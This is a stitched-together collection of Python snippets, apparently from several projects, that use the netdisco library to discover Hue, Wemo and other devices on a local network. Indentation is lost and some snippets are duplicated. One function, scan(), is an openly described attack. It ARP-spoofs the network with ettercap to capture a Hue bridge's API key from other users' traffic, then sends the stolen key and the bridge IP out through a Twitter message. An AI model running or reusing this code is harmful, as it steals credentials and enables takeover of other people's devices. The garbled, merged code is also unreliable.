def discover():
hue_bridges = []
LOG.info('Searching for Hue devices...')
netdis = NetworkDiscovery()
netdis.scan()
for dev in netdis.discover():
for info in netdis.get_info(dev):
if 'name' in info and 'Philips hue' in info['name']:
hue_bridges.append(info)
LOG.info('Hue bridge found: %s', info['host'])
netdis.stop()
if len(hue_bridges) == 1:
return hue_bridges[0]['host']
if len(hue_bridges) == 2:
LOG.warning('More than one Hue bridge found.')
elif not hue_bridges:
LOG.warning('No Hue bridges found.')
return None
def search_upnp_services(): netdis = NetworkDiscovery() netdis.scan() for dev in netdis.discover(): print(dev, netdis.get_info(dev)) netdis.stop()
def search_upnp_services():
netdis = NetworkDiscovery()
netdis.scan()
for dev in netdis.discover():
print(dev, netdis.get_info(dev))
netdis.stop()
def scan():
# Set up variables we might use
hue_ip = ""
api_key = ""
# We begin this attack by assuming that the chip has a WiFi connection to the network that the hue is on...
# Our first step is discover the ip address of the hue bridge (controller device)
# Run NUPnP GET request for Hue
r = requests.get("https://www.meethue.com/api/nupnp")
if "ipaddress" in r.text:
hue_ip = find_between(r.text, 'internalipaddress":"', '"')
keys.hue_ip = hue_ip
print("Found hue bridge at " + hue_ip)
# Use Slower UPnP lookup method if NUPnP fails.
if hue_ip is "":
print("NUPnP lookup failed. Trying UPnP search...")
netdis = NetworkDiscovery()
netdis.scan()
for dev in netdis.discover():
if "hue" in dev:
hue_ip = find_between(netdis.get_info(dev)[0][0], "(", ")")
keys.hue_ip = hue_ip
print("Found hue bridge at " + hue_ip)
netdis.stop()
# Exit if hue bridge IP is still not found
if hue_ip is "":
print("No hue device found on the network. Better luck next time!")
keys.hue_scanner_running = False
twitterSender.sendmessage("Sorry! I didn't find any skittles :(")
return
# If a bridge is found, our next step is to intercept any data being send to it...
print("\nNow the stakeout begins!")
print("Starting Ettercap to collect all data sent to " + hue_ip)
args = shlex.split('ettercap -T -M ARP -e "api/" /// //'+hue_ip+'/80')
while api_key is "":
ettercap = subprocess.Popen(args, stdout=subprocess.PIPE)
time.sleep(20)
ettercap.terminate()
capoutput = str(ettercap.communicate()[0], 'utf-8')
capoutput = capoutput.replace('/api/nouser', '') # we don't want to hit on this api key so we strip it out
if 'api/' in capoutput:
api_key="gotit"
# print(capoutput) --if enabled, prints packet output to console when the api key is found
api_key = find_between(capoutput, "api/", "/")
api_key = api_key.partition(' ')[0]
keys.hue_api = api_key
twitterSender.sendmessage("Hey! I got you some skittles! :)" + keys.hue_api + " " + keys.hue_ip)
keys.hue_scanner_running = False
def cli(ctx):
"""Discovery for the local network."""
from netdisco.discovery import NetworkDiscovery
netdiscovery = NetworkDiscovery()
netdiscovery.scan()
for device in netdiscovery.discover():
print(device, netdiscovery.get_info(device))
netdiscovery.stop()
ctx.vlog('Discovery executed: %s', timestamp())
class uPnPDiscovery:
def __init__(self, targetDeviceName=None):
try:
self.netdis = NetworkDiscovery()
self.netdis.scan()
# Declare variables, not war.
self.targetDeviceName = targetDeviceName
self.targetDevice = {}
print(
'Scanning Network for Belkin Wemo Insight Target Device Name: {}'
.format(self.targetDeviceName))
self.discover()
self.netdis.stop()
except Exception as e:
print('ERROR - {}'.format(e))
sys.exit(1)
def getTargetDevice(self):
return (self.targetDevice)
def discover(self):
try:
for device in self.netdis.discover():
#print(dev, netdis.get_info(dev)) # Debugging
if device == "belkin_wemo": # Discover Belkin Wemo devices
for element in self.netdis.get_info(device):
if element[
'model_name'] == "Insight": # Check it's a Wemo Insight model.
if element[
'name'] == self.targetDeviceName: # Check it matches our target name.
# Update empty dictionary with our discovered device.
self.targetDevice['ip'] = element['host']
self.targetDevice['port'] = element['port']
print(
'Found Belkin Wemo Insight Device matching Target Name: {}, IP: {}, Port: {}'
.format(element['name'], element['host'],
element['port']))
else:
print(
'Found Belkin Wemo Insight Device Name: {}, but did not match Target Name: {}. Skipping.'
.format(element['name'],
self.targetDeviceName))
pass
except Exception as e:
print('ERROR - {}'.format(e))
sys.exit(1)
def discover() -> List[str]:
try:
from netdisco.discovery import NetworkDiscovery
netdis = NetworkDiscovery()
netdis.scan()
results: List[str] = []
for dev in netdis.discover():
if dev in ('philips_tv', 'DLNA'):
info = netdis.get_info(dev)
logger.info("Discovered %s %s", dev, info)
results.extend([dev['host'] for dev in info])
netdis.stop()
return results
except ImportError:
return []
def cli(ctx: Configuration, raw):
"""Discovery for the local network."""
from netdisco.discovery import NetworkDiscovery
click.echo("Running discovery on network (might take a while)...")
netdiscovery = NetworkDiscovery()
netdiscovery.scan()
for device in netdiscovery.discover():
info = netdiscovery.get_info(device)
click.echo("{}:\n{}".format(device, format_output(ctx, info)))
if raw:
click.echo("Raw data:")
netdiscovery.print_raw_data()
netdiscovery.stop()
def main():
""" Handle command line execution. """
netdisco = NetworkDiscovery()
netdisco.scan()
# Pass in command line argument dump to get the raw data
if sys.argv[-1] == 'dump':
netdisco.print_raw_data()
print()
print()
print("Discovered devices:")
count = 0
for dev in netdisco.discover():
count += 1
print(dev, netdisco.get_info(dev))
print()
print("Discovered {} devices".format(count))
netdisco.stop()
def main():
""" Handle command line execution. """
netdisco = NetworkDiscovery()
netdisco.scan()
# Pass in command line argument dump to get the raw data
if sys.argv[-1] == 'dump':
netdisco.print_raw_data()
print()
print()
print("Discovered devices:")
count = 0
for dev in netdisco.discover():
count += 1
print(dev, netdisco.get_info(dev))
print()
print("Discovered {} devices".format(count))
netdisco.stop()
def _run_netdisco(self):
netdis = NetworkDiscovery()
netdis.scan()
for device_type in netdis.discover():
device_info = netdis.get_info(device_type)[0]
device_ip = device_info['host']
device_info['device_type'] = device_type
# Find MAC based on IP
try:
with self._host_state.lock:
device_mac = self._host_state.ip_mac_dict[device_ip]
except KeyError:
continue
# Get device_id based on MAC
device_id = utils.get_device_id(device_mac, self._host_state)
# Submit for upload lter
with self._host_state.lock:
self._host_state.pending_netdisco_dict \
.setdefault(device_id, []).append(device_info)
from __future__ import print_function
import sys
from netdisco.discovery import NetworkDiscovery
nd = NetworkDiscovery()
nd.scan()
# Pass in command line argument dump to get the raw data
if sys.argv[-1] == 'dump':
nd.print_raw_data()
print()
print()
print("Discovered devices:")
count = 0
for dev in nd.discover():
count += 1
print(dev, nd.get_info(dev))
print()
print("Discovered {} devices".format(count))
nd.stop()
import time
from netdisco.discovery import NetworkDiscovery
netdis = NetworkDiscovery()
netdis.scan()
for dev in netdis.discover():
print(dev, netdis.get_info(dev))
print(netdis.discover())
netdis.stop()
import time
from netdisco.discovery import NetworkDiscovery
netdis = NetworkDiscovery()
netdis.scan()
for dev in netdis.discover():
print(dev, netdis.get_info(dev))
netdis.stop()
